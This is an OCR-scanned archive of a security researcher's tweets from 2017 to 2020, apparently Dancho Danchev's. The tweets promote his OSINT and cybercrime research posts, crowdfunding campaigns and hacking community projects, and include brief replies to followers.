2017 


November 


29 - Wednesday 


02:17 
I’m back! #security #cybercrime #malware 


*1 
02:25 
Missing #Koobface? Watch my Keynote: Exposing Koobface - The World’s Largest 
Botnet at @CybercampEs 2016 - https://t.co/q5iTxLwmK1 


21 *%2 
03:15 


New Report - Assessing The Computer Network Operation (CNO) Capabilities of the 
Islamic Republic of #lran - Report [pdf] - https://t.co/nl2A6DhGYV Related @memric]l 
coverage - https://t.co/XepyZyMmGx 


30 - Thursday 


00:10 


@DanRaywood Hello. It’s a pleasure to reconnect again. Are you still keeping track of 
my research? Thanks. Dancho. 


December 


5 - Tuesday 


00:24 
@imaguid Hello. This has been fixed. Thanks. Dancho. 


00:27 


@DanRaywood Hello. | still maintain the operate https://t.co/vzz0lbZWGxX feel free to 
follow my research including subscription to my RSS feed - https://t.co/weRtV8WDBd 
Thanks. Dancho 


*1 
00:28 


@RefundSearch @danchodanchev Hello. What do you have in mind? Let me know. 
Thanks. Dancho. 


00:29 
@parrotgeek1 @mikko Hello. This has been fixed. Thanks. Dancho. 
00:30 
@SMWonk Hello. You’re most welcome. Thanks. Dancho. 
00:32 


Did you enjoy my "Keynote: Exposing Koobface - The World’s Largest Botnet" 
presentation? Let me know. Thanks. Dancho. https://t.co/UCbDlytkgz 


*1 
00:37 

@braoru Thanks. Dancho. 
00:37 

@mrkoot Thanks. Dancho. 
00:38 


@BillionaireBay @danchodanchev Hello. What do you have in mind? Thanks. Dancho. 


01:02 


@MalwareTechBlog @Flavialicious @mikko @briankrebs Hello. Catch up with my post 
at - Dancho Danchev’s 2010 Disappearance - An Elaboration - 
https://t.co/oCW1d9hZTy 


01:03 


@ShanexX @ryanaraine Hello. Find out more about what really happened at - Dancho 
Danchev’s 2010 Disappearance - An Elaboration - https://t.co/oCW1d9hZTy 


01:03 
@linkbruttocane Thanks. Dancho. 


01:04 
@druvainc @BrianHonan Hello. Thanks. Dancho. 


01:05 
@abnev Hello. | will be resolving this shortly. Thanks. Dancho. 


01:06 
@braoru Thanks. Dancho. 
01:06 
@BarryRGreene Thanks. Dancho. 
01:08 


@andris_ soroka @danchodanchev Hello. Thanks for the consideration. | will be 
definitely looking forward to participating in future events. Thanks. Dancho. 
01:09 
@CarolMatlack @danchodanchev Hello. Thanks for the consideration. | will be 
definitely looking forward to participating in the future. Thanks. Dancho. 
01:09 
@pavanduggal @danchodanchev Hello. Thanks for the consideration. | will be 
definitely looking forward to participating in future events. Thanks. Dancho. 
01:10 
@DaveWandera @danchodanchev Hello. Thanks for the consideration. What is the 
project about? Let me know. Thanks. Dancho. 
01:11 


@ICACC2015 @danchodanchev Hello. Thanks for the consideration. | will be 
definitely looking forward to participating in future events. Let me know. Thanks. 
Dancho. 


01:13 


@DougBockClark @danchodanchev Hello. Thanks for the consideration. | will be 
definitely looking forward to participating in the future. Let me know. Thanks. 
Dancho. 


01:13 
@Jason_Healey @danchodanchev Hi, Jason. You’re welcome. Thanks. Dancho. 


01:15 


@jason_trost @danchodanchev Hello. Catch up with what really happened - Dancho 
Danchev’s 2010 Disappearance - An Elaboration - https://t.co/poCW1d9hZTy 


*1 
01:15 


@cyberwar @danchodanchev Hi, Richard. You’re welcome. Thanks. Dancho. 


01:16 


@GenjuShimada @danchodanchev Hello. Thanks for the consideration. | look 
forward to participating in future events. Let me know. Thanks. Dancho. 


01:17 
@Thalesesecurity @helpnetsecurity @rik_ferguson @BrianHonan @danchodanchev 
@briankrebs Hello. Thanks. Dancho. 
01:18 


@maksumuto @danchodanchev Hello. Thanks a lot for the consideration. | will be 
definitely looking forward to participating in the future. Let me know. Thanks. 
Dancho. 


01:19 


@atomicdarinka @danchodanchev Hello. Thanks a lot for the consideration. | will be 
definitely looking forward to participating in the future. Let me know. Thanks. 


Dancho. 
01:29 
@stevewgold @danchodanchev Hi, Steve. Thanks. Dancho. 
01:30 
@knolinfos @danchodanchev Hello. Thanks. Dancho. 
01:33 


Guess who’s back? - https://t.co/vzz01bZWGxX - New Post - Dancho Danchev’s 2010 
Disappearance - An Elaboration - https://t.co/pCW1d9hZTy CC: @mikko @e_kaspersky 
@briankrebs @KimZetter @ryanaraine 

02:10 


Related #Koobface coverage on my "Keynote: Exposing Koobface - The World’s 
Largest Botnet" presentation. Courtesy of @CybercampEs. https://t.co/7KNTyD3t6H 


*2 
02:42 


Related #Koobface coverage on my "Keynote: Exposing Koobface - The World’s 
Largest Botnet" - https://t.co/TxdnjGDXZD [PPT] Watch the actual presentation here - 
https://t.co/UTo6t4uACd https://t.co/dfCN6Arl7K 


2 


2018 


May 


23 - Wednesday 


05:03 


| wanted to let everyone know that I’ve recently resumed my research at 
https://t.co/BQEsotlj1C and will be posting an updated set of research articles 
anytime soon. RT pls. #cybercrime #security #malware stay tuned! 


24 - Thursday 


02:33 


So the GCHQ has been following me on Twitter including active traffic monitoring - 
https://t.co/Hc5cq9ygg4 Take that. U.S "talking points" horses and animals. What’s 
next? RBN "knocking on my door" party? Depends on the nature of the research. 
Stay tuned! 


02:50 


Interested in participating in a security podcast including a possible security 
conversation regarding GCHQ’s Lovely Horse program? Feel free to approach me 
including your contact details. CC: @Oxcharlie @alexsotirov @anonops 
@AnonymousIRC @anon_operations 


02:54 


Related request for participation in a security podcast including a possible security 
conversation regarding GCHQ’s Lovely Horse program. Feel free to approach me with 
your contact details. CC: @bradarkin @CeRTFi @daveaitel @dinodaizovi @diocyde 
@egyp/ 


02:57 


Related request for participation in a security podcast including a possible security 
conversation regarding GCHQ’s Lovely Horse program. Feel free to approach me with 
your contact details. CC: @GoVCeRT_NL @halvarflake @hdmoore @hernano 
@JaNeTCSiRT 


02:59 


Related request for participation in a security podcast including a possible security 
conversation regarding GCHQ’s Lovely Horse program. Feel free to approach me with 
your contact details. CC: @kevinmitnick @lennyzeltser @mdowd @mikko 
@msftsecresponse 

03:02 


Related request for participation in a security podcast including a possible security 
conversation regarding GCHQ’s Lovely Horse program. Feel free to approach me with 
your contact details. CC: @owasp @pusscat @Shadowserver @snowfl0w 
@taosecurity 

03:04 


Related request for participation in a security podcast including a possible security 
conversation regarding GCHQ’s Lovely Horse program. Feel free to approach me with 
your contact details. CC: @teamcymru @thegrugq @TheHackersNews @tinman2k 
@VuPeN @WTFuzz 


August 


3 - Friday 


09:01 


Dear, followers, | will be shortly resuming my activity on Twitter. Can you please 
spread the word? #security #cybercrime #malware 


11 - Saturday 


04:57 


New Post - Historical OSINT - Summarizing 2 Years of @Webroot’s Threat Blog Posts 
Research - https://t.co/J4uzBESPOD #security #cybercrime #malware 


22 *%2 
05:06 


Related portfolio of Historical OSINT research - https://t.co/BG3CwNYOpq 
https://t.co/mYrbZQUBhW https://t.co/kzXWfapY02 https://t.co/9BFdKYdUrr 
https://t.co/dkr4mihCe6 https://t.co/g6QR8iMj4a https://t.co/LZCBYdn3lH 
05:08 


Yet another portfolio of Historical OSINT research - https://t.co/kW4o02yOJVO 
https://t.co/XryhcgneWD https://t.co/asVU5Ofy9Q https://t.co/hfgdlife2fN 
https://t.co/rjbhVZypS7 https://t.co/4Z5HVmuwDs https://t.co/nOdFm9T2G7 


05:21 


Remember the Russian Business Network and the New Media Malware Gang? Catch 
up this historical OSINT analysis - "Historical OSINT - Inside the 2007-2009 Series of 


8 


Cyber Attacks Against Multiple International Embassies" - https://t.co/NBvVIitvTiu 


06:08 
If you believe that you need to become a cybercriminal in order to catch a 
cybercriminal, you’re an OSINT/CYBERINT amateur. 

10:03 
The only way to work with someone you don’t like is by realizing the seriousness of 
the job you’re doing. #security #cybercrime #malware 
10:25 


Related portfolio of Historical OSINT research - https://t.co/my8AKfalgl 
https://t.co/uxX5C9gliqqa https://t.co/PsT4Am3J0Og https://t.co/niOUAbcG5D 
https://t.co/ncJoZdRbhi https://t.co/5PJjO8zvkH https://t.co/ZCsZg7nGpw 
11:31 


Related portfolio of Historical OSINT research - https://t.co/OMMCsbFoYW 
https://t.co/VmrPzwVYEI https://t.co/8Irnb8ulxF https://t.co/GPdleyykGj 
https://t.co/HeYx3u7bSN https://t.co/HOnlYcqwkKb https://t.co/PzC6SgwsLt 
https://t.co/sKUJ8hGJ41 
12:58 


The day you’re able to gather all this without interacting with the person in question, 
is the day when you can officially call yourself a pro. #security #cybercrime 
#malware 


October 


7 - Sunday 


13:59 


New Post - "Dancho Danchev’s 2010 Disappearance - An Elaboration - Part Two" - 
https://t.co/iiC6pI3CgY #security #cybercrime #malware 


8 - Monday 


04:40 


Interested in obtaining free access to Threat Data for research purposes? Approach 
me at disruptive.individuals@gmail.com My PGP key - https://t.co/iiC6plI3CgY 
#security #cybercrime #malware 


19 - Friday 


10:47 
I’m back! My RSS feed - https://t.co/d9aUCckSEQ #security #cybercrime #malware 


10 


2019 


January 


15 - Tuesday 


08:35 


New Post - Who’s Behind BakaSoftware? - OSINT Analysis - https://t.co/jkSORQjIBY 
#security #cybercrime #malware 


*1 


16 - Wednesday 


02:03 


New Post - Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted Checklist - 
OSINT Analysis - https://t.co/1xUuUc4tDe #security #cybercrime #malware CC: 
@FBIMostWanted 


<1 *l 
06:14 


New Post - Historical OSINT - A Portfolio of Fake Tech Support Scam Domains - An 
Analysis - https://t.co/cxzxGPd9N4 #security #malware #cybercrime 


*1 


24 - Thursday 


09:30 


New Post - The Threat Intelligence Market Segment - A Complete Mockery and IP 
Theft Compromise - An Open Letter to the U.S Intelligence Community - 
https://t.co/OVULL5sL6W #security #cybercrime #malware 


21 *%2 
09:48 
11 


Did you miss me folks? Check out my latest OSINT analysis here - 
https://t.co/jkKSORQjIBY ; https://t.co/1xUuUc4tDe; https://t.co/cxzxGPd9N4 
#cybercrime #security #malware 


21 *3 


25 - Friday 


06:34 


Folks, I’ve just added a "Donate Today!" button at my https://t.co/wK6vExTcYa looking 
forward to receiving your generous feedback and possible donations. Stay tuned! 
#security #cybercrime #malware 


February 


2 - Saturday 


23:53 


| wanted to let you Know that I’ve just launched the following campaign on 
@Indiegogo - "Astalavista Security 2.0 - A Hacker in Every Home" - 
https://t.co/HkvtYmJAga looking forward to receiving your valuable feedback 
donations and questions. Thanks. Dancho. 


22 *%2 


3 - Sunday 


09:28 


RT @clubmasterfu: This is a nice campaign @dancho_danchev . | remember 
https://t.co/EEMaEqOFPA . The COM tld was a generic search engine, b... 


23:21 
New Post - Official Astalavista 2.0 Campaign Announcement - 
https://t.co/HdMbv2xNad #security #cybercrime #malware 
*1 
4 - Monday 
00:40 


New Post - Official Astalavista 2.0 - Press Release Launch - https://t.co/uJOxCv3BH9 
#security #cybercrime @malware 
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03:42 
New Update - Official Astalavista 2.0 -Statement of Work - https://t.co/EcNI4pUJV4 
#security #cybercrime #malware 
07:23 


New Post - Official Astalavista 2.0 - The Big Idea - https://t.co/VClUe7gkt3 #security 
#cybercrime #malware 


*1 


5 - Tuesday 


01:59 


New Post - Official Astalavista 2.0 - The Fanciful Story - https://t.co/KIBjqBGHeC 
#security #cybercrime #malware CC: @anthonyaykut CC: @kevtownsend Stay 
tuned! Thanks. Dancho. 


21 %1 


8 - Friday 


09:26 
New Post - Historical OSINT - Re-Shipping Money Mule Recruitment "Your Shipping 
Panel LLC" Scam Domain Portfolio Spotted in the Wild - https://t.co/uHrTpPANQQR 
#security #cybercrime #malware 
09:27 
New Post - Historical OSINT - Global Postal Express Re-Shipping Mule Recruitment 
Scam Spotted in the Wild - https://t.co/qbxlse8sBB #security #cybercrime #malware 
09:29 


New Post - Historical OSINT - Able Express Courier Service Re-Shipping Mule 
Recruitment Scam Spotted in the Wild - https://t.co/7tOZsJHkfn #security 
#cybercrime #malware 
09:30 


New Post - Historical OSINT - Profiling a Typosquatted Facebook and Twitter 
Impersonating Fraudulent and Malicious Domains Portfolio - https://t.co/jgNz8tlsdT 
#security #cybercrime #malware 


09:32 


New Post - Historical OSINT - Profiling a Rogue and Malicious Domain Portfolio of 
OEM-Pirated Software - https://t.co/Op87RNL85s #security #cybercrime #malware 
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09:33 


New Post - Historical OSINT - A Peek Inside The Georgia Government’s Web Site 
Compromise Malware Serving Campaign - 2010 - https://t.co/KV38selnN9 #security 
#cybercrime #malware 


22 *1 
09:34 


New Post - Historical OSINT - Profiling a Portfolio of Fake Visa Application Scam 
Domains - https://t.co/eDPTK4Q3sN #security #cybercrime #malware 


21 


09:36 


New Post - Historical OSINT - Sub7 Crew Releases New Version on 11th Anniversary of 
The RAT - https://t.co/ic4tY2jJ6UE #security #cybercrime #malware 


21 
09:37 
New Post - Historical OSINT - "| Know Who DDoS-ed Georgia and 
https://t.co/OPLSbzSK7Q Last Summer" - https://t.co/MmyjjTSKJX #security 
#cybercrime #malware 
21 
10:02 


The old farts VS Generation | cybercrime fighters warfare, is currently taking place 
everywhere. Let the true professionals win! #security #cybercrime #malware 


10:11 


The day LE starts chasing down legitimate researchers, is the day when LE officially 
has no clue where the real criminals are. #security #cybercrime #malware 


<1 *1 
10:16 


No cybercriminal starts from scratch in 2019. It takes a modest $500 investment to 
purchase 1k infected-hosts botnet. #security #cybercrime #malware 


12:26 


With or without branding and re-branding of threats, it’s cyber espionage and 
cybercrime "as usual". #security #cybercrime #malware 


12:27 


If rebranding of cyber espionage is necessary to boost R&amp;D 
motivation/productivity, that’s an entirely different problem by itself. #security 
#cybercrime #malware 


14 


12:30 


The APT is only an element of something bigger. It’s called "unrestricted warfare" in 
combination with information warfare/cyberwarfare and beyond. #security 
#cybercrime #malware 


12:39 


With the buzz surrounding Russia’s understanding of cyber warfare everyone should 
avoid using the term disinformation and should stick to regular U.S based cyber 
warfare doctrine based principles. #security #cybercrime #malware 


12:54 


With the U.S government recently lowering down the "adversarial" cyber warfare 
entry barriers it should be noted that security researchers could also be labeled as a 
possible threat. Sample analysis - https://t.co/OVULL5sL6W #security #cybercrime 
#malware 


9 - Saturday 


04:15 


Remember GCHQ’s Lovely Horse/Two Face/Zool program whose purpose is to data 
mine and eavesdrop on key members of the Security Industry for OSINT? - 
https://t.co/Hc5cq9ygg4 Stay tuned for an upcoming assessment on the platform and 
how you can "perform" better. 


05:10 


Speaking of GCHQ’s Lovely Horse/Two Face/ZooL - https://t.co/PAONfNLfio did you 
know that back in 2010 @abuse ch received a flood of fraudulent transactions for 
drugs - https://t.co/AgMBC1ZBI1F including a Hitman request for me - 
https://t.co/HSNTdeztSR 


March 


22 - Friday 


10:47 


Announcing Offensive Warfare 2.0 - https://t.co/dSqJniBKue request an invite today! 
RT pls! #security #hacking #malware #cybercrime #botnet 


22 *%1 
15 


April 


23 - Tuesday 


05:55 


New Post - Flashpoint Intel Official Web Site Serving Malware - An Analysis - 
https://t.co/K46AcPVxOH CC: @Flashpointintel 


24 - Wednesday 


10:14 


I’ve just updated the original - "Flashpoint Intel Official Web Site Serving Malware - An 
Analysis" post - https://t.co/xinChpPzdJ @Flashpointintel issued a response - 
https://t.co/loQyqdaO7K and @SCMagazine picked up the story - 
https://t.co/g6kH8AtowxX 


May 


11 - Saturday 


01:28 


Just came across this message courtesy of @HBGary - https://t.co/NCaSzKlanh seems 
like | made it to @wikileaks and let’s not forget the @Snowden archive - 
https://t.co/UeaZOVuJkK Keeping it cool? Cheers to @Greghoglund for reaching out! 
Keep it coming! 


05:25 
Missing the editorial? Check out my newly launched - https://t.co/8KKLYQSBQB - 
Unit-123 - The World’s Leading Cyber Threat Intelligence Portal. Stay tuned! 
05:30 


New Post - https://t.co/UIVFqv6n5M - Welcome to Unit-123 - Official Launch 
Announcement - https://t.co/DSeqeidQHm #security #cybercrime #malware #botnet 
#cybersecurity #cybersec #CyberHunter #hacking #Hacker #Hackers 


05:32 


New Post - https://t.co/UIVFqv6n5M - France to Wage Offensive Cyber Warfare - Brace 
Yourselves! - https://t.co/BIHUyp6juN #security #cybercrime #malware #botnet 
#cybersecurity #cybersec #CyberHunter #hacking #Hacker #Hackers 


21 
05:39 
New Post - https://t.co/UIVFqv6n5M - UAE - Where Money Pays - Do You Want to be a 


Cyber Warrior? - https://t.co/zCl7WNHBp8 - #security #cybercrime #malware 
#botnet #cybersecurity #cybersec #CyberHunter #hacking #Hacker #Hackers 
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22 


05:41 


New Post - https://t.co/UIVFqv6n5M - Oops, White House National Cyberspace 
Strategy Acknowledges Information Warfare Operations - https://t.co/A6dsIAtjVv - 
#security #cybercrime #malware #botnet #cybersecurity #cybersec #CyberHunter 
#hacking #Hacker #Hackers 


21*l 

05:43 
New Post - https://t.co/UIVFqv6n5M - Proactively Digging in the U.S Cyber Warfare 
Realm - And How You Can Perform Better? - https://t.co/NoWUIBq9jk - #security 


#cybercrime #malware #botnet #cybersecurity #cybersec #CyberHunter #hacking 
#Hacker #Hackers 


real 


05:46 


Did you know that I’ve recently launched an extremely popular Pro-Western 
invite-only Security and Hacking community - https://t.co/WIBGTU5ryT? Feel free to 
approach me and request an invite - to join the action today! #security #cybercrime 
#malware #hacking 

06:54 


New Post - Exposing Yet Another Currently Active Fraudulent and Malicious 
Pro-Hamas Online Infastructure - https://t.co/ipNlgAWszr #security #cybercrime 
#malware #botnet #terrorist #TerroristPropaganda #jihadist #Hamas 


21*1 
06:56 


New Post - Historical OSINT - Profiling the Loads[.]cc Enterprise - 
https://t.co/xu2OPf6xux #security #cybercrime #malware #botnet #DDoS 


06:58 


New Post - Historical OSINT - Massive Scareware Serving Campaign Spotted in the 
Wild - https://t.co/FUdR7ZwWES3 #security #cybercrime #malware #botnet 


07:00 


New Post - Historical OSINT - Yet Another Massive Scareware Serving Campaign 
Courtesy of the Koobface Gang - https://t.co/UtiOlFelBc #security #cybercrime 
#malware #botnet 


07:02 


New Post - Historical OSINT - Yet Another Massive Scareware-Serving Campaign 
Courtesy of the Koobface Gang - https://t.co/EHrCqxhOl1u - #security #cybercrime 
#malware #botnet 
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15 - Wednesday 


00:24 

It’s official! Offensive Warfare 2.0 - The Future of Cyber Warfare - Hacking and Cyber 
Security Community - Public Registration Now Open! - https://t.co/9PMxyz6Sb6 

Register Today - Like This Post - Comment - And Share it With Friends and Colleagues! 

05:51 


Offensive Warfare 2.0 - Official Launch! - https://t.co/9PMxyz6Sb6 RT pls! #security 
#cybercrime #malware #botnet #CyberSecurity #CyberThreat #Cyberthreats 
#informationsecurity #hacking #Hacker #hack 


July 


3 - Wednesday 


06:02 


This Friday! Offensive Warfare 2.0 Cyber Security and Hacking Community - 
https://t.co/WIBGTU5ryT YouTube Livestream Broadcast with me on the Introduction 
of the Project! RSVP today - https://t.co/ORpcVnYOUs RT pls! #security #cybercrime 

#malware 


08:01 


This Friday! - Live Two-Hour YouTube Livestream with me on the recently launched 
Offensive Warfare 2.0 Community - https://t.co/WIBGTU5ryT Bookmark the link now - 
https://t.co/mSiPxBYSbc RSVP today! - https://t.co/WA6PIK3AzT Stay tuned! 


4 - Thursday 


07:44 

This Friday! Two-Hour Offensive Warfare 2.0 - Cyber Security and Hacking Community 

- https://t.co/obnlILUP27Yf Live YouTube Livestream Broadcast with me! Did you RSVP 
already - https://t.co/ORpcVnYOUs #security #cybercrime #malware 

5 - Friday 


07:11 


Live YouTube Broadcast - in 3 Hours! - https://t.co/YnruQLWLJu #security 
#cybercrime #malware 


30 - Tuesday 


05:03 


@MhmtVYY Hello - how can | be of any help? | can be reached at 
dancho.danchev@hush.com Let me know. Thanks. Dancho. 
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05:06 


New Post - Exposing Bulgaria’s Largest Data Leak - An OSINT Analysis - 
https://t.co/t49cZdIngz #security #cybercrime #Malware 


05:07 


New Post - Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber 
and XMPP Accounts - https://t.co/ztAhszwvmd #security #cybercrime #malware 


*1 
05:09 


New Post - Exposing Evgeniy Mikhaylovich Bogachev and the "Jabber ZeuS" Gang - 
An OSINT Analysis - https://t.co/ewBaYgusMN #security #cybercrime #malware 


05:10 


New Post - Profiling "Innovative Marketing" - The Flagship Malvertising andf 
Scareware Distributor - Circa 2008 - An OSINT Analysis - https://t.co/H7hY7kTEhl 
#security #cybercrime #malware 


07:32 
My RSS feed - https://t.co/weRtV8WDBd please subscribe today! RT pls! Stay tuned! 


August 


1 - Thursday 


03:02 


New Post - Who’s Behind the Syrian Electronic Army? - An OSINT Analysis - 
https://t.co/Cid61EZfCw #security #cybercrime #malware 


1 ¥e2 


21 - Wednesday 


01:14 
New Post - gOt Bitcoin? - https://t.co/TUaJNb9LCk #security #cybercrime #malware 


03:43 


Did you grab an account already? Offensive Warfare 2.0 - Cyber Security and Hacking 
Community! Register Today! - https://t.co/AVmthuWBNu 


22 - Thursday 
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08:44 


Introducing Cybertronics - Virtual Reality for Hackers and Security Experts - Check out 
this Dark Web Onion and Donate Bitcoin Today - https://t.co/XgjY771xw0O 
https://t.co/O8nlolHWZQ 


Cybertronics 


23 - Friday 


01:41 


Just had my first Bitcoin donation for Cybertronics - Virtual Reality for Hackers and 
Security Experts. Check out this Dark Web Onion - https://t.co/XgjY77j8ny and donate 
today! Stay tuned! 


September 


6 - Friday 


17:23 


Missing Koobface? Check out this Infographic courtesy of @CybercampEs 2016 
where | used to held the Keynote presentation. Watch the video here - 
https://t.co/UTo6t4uACd and check out the PPT here - https://t.co/oo5hjgR3qE 
https://t.co/x3tH4yvFOY 


*1 
20 


EXPOSING KOOBFACE: THE 
WORLD'S LARGEST BOTNET 
DANCRO DANCHEV 


) x : Hf if (0 7 i 


7 - Saturday 
04:53 


New Post - DDanchev is for Hire! - https://t.co/pjNZOjtWZC #security #cybercrime 
#malware https://t.co/36Yvq47U8i 


21 


14:58 


https://t.co/JTcqOaYgET https://t.co/q4CcTsu6kC 


22 


9 - Monday 


05:10 


If cybercrime is a form of economic terrorism - then the Dark Web is my home PC 
circa the 90’s with a degree of recognition for today’s modern adult porn content 
artists. #security #cybercrime #malware 


05:38 
New Post - Historical OSINT - The Russian Business Network Says "Hi" - 
https://t.co/NJFEtqqiYm #security #cybercrime #malware 
el 
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06:51 


Anyone using Threema or SilentCircle? Can you please share your ID? Let me know. 
Thanks. Dancho. #security #cybercrime #malware 


08:12 


New Post - Join Me on Patreon Community! - https://t.co/lJeLHAhPwx #security 
#cybercrime #malware 


14 - Saturday 


23:28 


New Post - Fake NordVPN Web Site Drops Banking Malware Spotted in the Wild - 
https://t.co/o8spXlyuZP #security #cybercrime #malware 


*1 
23:31 


New Post - Historical OSINT - Georgian Justice Department and Georgia Ministry of 
Defense Compromised Serving Malware Courtesy of the Kneber Botnet - 
https://t.co/BJecVfj4Yb #security #cybercrime #malware 


21 %1 


16 - Monday 


00:47 


Guess who’s running one of the World’s most popular Security blogs? It seems as 
you've been reading it all along - https://t.co/ela7lYefaZ Care to join the Team? 
Approach me at disruptive.individuals@gmail.com Stay tuned! 


October 


15 - Tuesday 


15:31 


Guess who used to run the show circa 2008-2013? It’s a pleasure and an honor to let 
you know that I’ve recently came across to @jeffreycarr’s TaiaGlobal PPT which lists 
me as a major Cyber Threat Intelligence competitor next to the DHS. Outstanding! 
https://t.co/TSQ7JthUNr 
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Competitors 


® Identified Competitors * iDefense Labs (US) 
(US) * Informatica (US) 


* Cyber Security Research and * IT-—Information Sharing and 
Development Center (US) Analysis Center (US) 


Cyveillance (US) iSIGHT Partners (US) 

« Dancho Danchev (EU) Lookingglass (US) 

* Department of Homeland * Multi-State Information Sharing 
Security US-CERT(US) Analysis Center (US) 

* Ernst & Young (EU) nCircle (US) 

* EWA Information and * SecureWorks (US) 
Infrastructure Technologies, Inc. * Trend Micro (US) 
(US) * United States Cyber 

+ Fortify (US) Consequence Unit (US) 

* Global Security Mag (EU) 


16 - Wednesday 


10:27 


Announcing Law Enforcement and OSINT Intelligence Operation "Uncle George" - Join 
Me Today! - https://t.co/d3YC3PabV7 


19 - Saturday 


11:18 


Did you grab an account already? Offensive Warfare 2.0 - Cyber Security and Hacking 
Community - https://t.co/RHH1ws1pGO #security #cybercrime #malware 


20 - Sunday 


02:05 


Thanks to Jeff at @Treadstone71LLC for featuring an article regarding the Official 
Launch of Offensive Warfare 2.0 - Cyber Security and Hacking Community - 
https://t.co/sNK8CyLCpZ grab an account today and let’s get the conversation going! 

02:30 


Third day in a row - Law Enforcement and OSINT Intelligence Operation "Uncle 
George" is currently taking progress! - https://t.co/d3YC3PabV7 Thanks to everyone 
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who approached me! Dare to participate? Drop me a line and let’s get down to work! 
Cheers! 


02:33 


Big thanks to @packet_storm for featuring a News Article about the ongoing Law 
Enforcement and OSINT Intelligence Operation "Uncle George" - 
https://t.co/uteRbYH5mf Interested in obtaining a copy of the archive for enrichment 
and processing? Drop me a line! 

10:02 


I’m on Medium! My first post - "Assessing U.S Military Cyber Operational Capabilities 
to Counter Pro-ISIS Internet Infrastructure" - https://t.co/kuTdPOiU2d Can you please 
share the post? 


21 - Monday 


15:34 


New Post on Medium - "My Involvement in the Top Secret GCHQ “Lovely Horse” 
Program and the Existence of the Karma Police" - https://t.co/gZyu2eginO #security 
#cybercrime #malware 


22 - Tuesday 


06:25 


New Post on Medium - "Kaspersky’s Antivirus Products the NSA and U.S National 
Security - An Analysis" - https://t.co/Falizb2LHL #security #cybercrime #malware 


25 - Friday 


08:38 


Just launched a new set of upcoming posts on Medium! My fourth post - "Assessment 
of U.S Intelligence Community Cyber Surveillance Programs and Tradecraft — Part 
One" - https://t.co/PXHXXVysmh Join me on Medium and stay tuned! 


27 - Sunday 


06:13 


New Post on Medium! - "How the NSA utilized Iranian Cyber Proxies To Participate in 
the BOUNDLESS INFORMANT Program?" - https://t.co/o9EpVU6kzd #security 
#cybercrime #malware 


28 - Monday 


11:44 


New Post on Medium! - "Exposing GCHQ’s Top Secret “GORDIAN KNOT” Cyber 
Defense Sensor Program — An Analysis" - https://t.co/PBEmWe5EgU Check out the 
original "practical protection advice" research analysis - https://t.co/PXHXXVysmh 
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29 - Tuesday 


06:51 


| just finished updating my Patreon Community Page including several other new Tiers 
- https://t.co/jlaKUBZNwl Dare to join me Today! It would be a pleasure and an honor 
to offer the usual Security Research services to a direct set of supporters. Stay tuned! 


30 - Wednesday 


07:49 


New Post - "Cyber Security Project Investment Proposal - Astalavista Security Group - 
Official Re-Launch - Support me Today!" - https://t.co/FKihjCTbfL #security 
#cybercrime #malware 


November 


13 - Wednesday 


21:32 


Big News! I’ve joined forces with Armadillo Phone - https://t.co/oTMxAAZxLB for the 
purpose of continuing my research in nation-state and rogue and malicious actor 
tracking and profiling including the rise of mobile malware and the anticipation of 

new cyber attack threats. 


24 - Sunday 


14:50 


New Post - Exploring the Basics of Cyber Assets and Cyber Inventory Efforts Build-up 
- A Proposed Off-the-Shelf Methodology - https://t.co/yNkliddV6h #security 
#cybercrime #malware 

21 
14:55 


New Post on Medium - Exposing GCHQ’s URL-Shortening Service and Its Involvement 
in Iran’s 2009 Election Protests - https://t.co/eP3VMV3Cuh #security #cybercrime 
#malware 


21 *%2 


25 - Monday 


10:01 


New Post - Official World Hacker Global Domination Group (WHGDG) Dark Web Onion 
Launch! - https://t.co/DLWoMZdO4H #security #cybercrime #malware 
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December 


15 - Sunday 


07:24 


My new day job! - https://t.co/8BKKLYQSBQB Help me land it permanently! Forward a 
Gift Card to a friend. Happy Holidays! Cheers. Dancho. #security #cybercrime 
#malware https://t.co/BcJJ5hHaxe 


Popular Tags: 
Hacker Group Cybercrime Forum Cybercrime Forum Community 
Cybercrime Community Cybercrime Forum Data Set 


es 1 ae wey ; = 
eg OE a 
Unit-123 


hreat intelligence Products Porta 


16 - Monday 
08:30 
Happy Holidays! - https://t.co/OsoO5QIdH6 #security #cybercrime #malware 


21 %1 


20 - Friday 


09:46 


Anyone up for Christmas Discounts? https://t.co/8KKLYQSBQB #security #cybercrime 
#malware #osint #cyberattacks #hackers #Hacking #ThreatHunting #Threatintel 
https://t.co/DOaFKYrReH 
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Popular Tags: 
Hacker Group Cybercrime Forum Cybercrime Forum Community 
Cybercrime Community Cybercrime Forum Data Set 


09:49 


New post on Medium - Introduction to https://t.co/UIVFqv6n5M — The Primary 
Destination Spot for Intelligence Deliverables - https://t.co/yZ1IDfYCO2 #security 
#cybercrime #malware 


*1 


21 - Saturday 


09:08 
New Post on Medium - Is a Virtual Reality Social Network for Hackers and Security 
Experts Ever Possible? — An Analysis - https://t.co/8wvBATaNrC #security 
#cybercrime #malware 
11:29 


New Post on Medium - "FBI Most Wanted Cybercriminals — OSINT Checklist — An 
Analysis" - https://t.co/cQJOUWMXcQ #security #cybercrime #malware 


*3 


22 - Sunday 


07:10 


New Post on Medium - "https://t.co/Xest1SInvx — The Scene the Way We Know it — 
My Experience in Running the Portal" - https://t.co/15SJ5KRtFf #security #cybercrime 
#malware 


*1 
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23 - Monday 


05:44 


New Post on Medium - "Exposing the U.S Intelligence Community and GCHQ’s Use of 
“Dirty Tricks” Online — An Analysis” - https://t.co/A7YSn6R8Fh #security #cybercrime 


#malware 
11:20 
Happy Holidays! Keep up the good fight and keep the spirit! - 
https://t.co/DOXwqk25wy #security #cybercrime #malware 
ral 
27 - Friday 
06:54 


New Post - "Exposing High Tech Brazil Hack Team Mass Web Site Defacement Group - 
An OSINT Analysis" - https://t.co/GRKPb3cAiv #security #cybercrime #malware 


30 - Monday 


10:06 


New Post on Medium - "How the GCHQ Used the Top Secret “ANTICRISIS GIRL’ 
Program to Spy on Users — An Analysis" - https://t.co/unAJFm4d3x #security 
#cybercrime #malware 


<7 *4 
10:07 


New Post on Medium - "The 2016 U.S Presidential Elections and Russia’s Active 
Measures in Terms of Cyber Espionage" - https://t.co/rZi2XqL9nf #security 
#cybercrime #malware 


*1 


30 


2020 


January 


1 - Wednesday 


07:42 
Joining Team Armadillo Phone! - https://t.co/I[ANoR7mgs] #security #cybercrime 
#malware 
*1 
07:43 


The Armadillo Phone - A Security Review - https://t.co/iaozFue4VO #security 
#cybercrime #malware 


*1 


8 - Wednesday 


09:46 


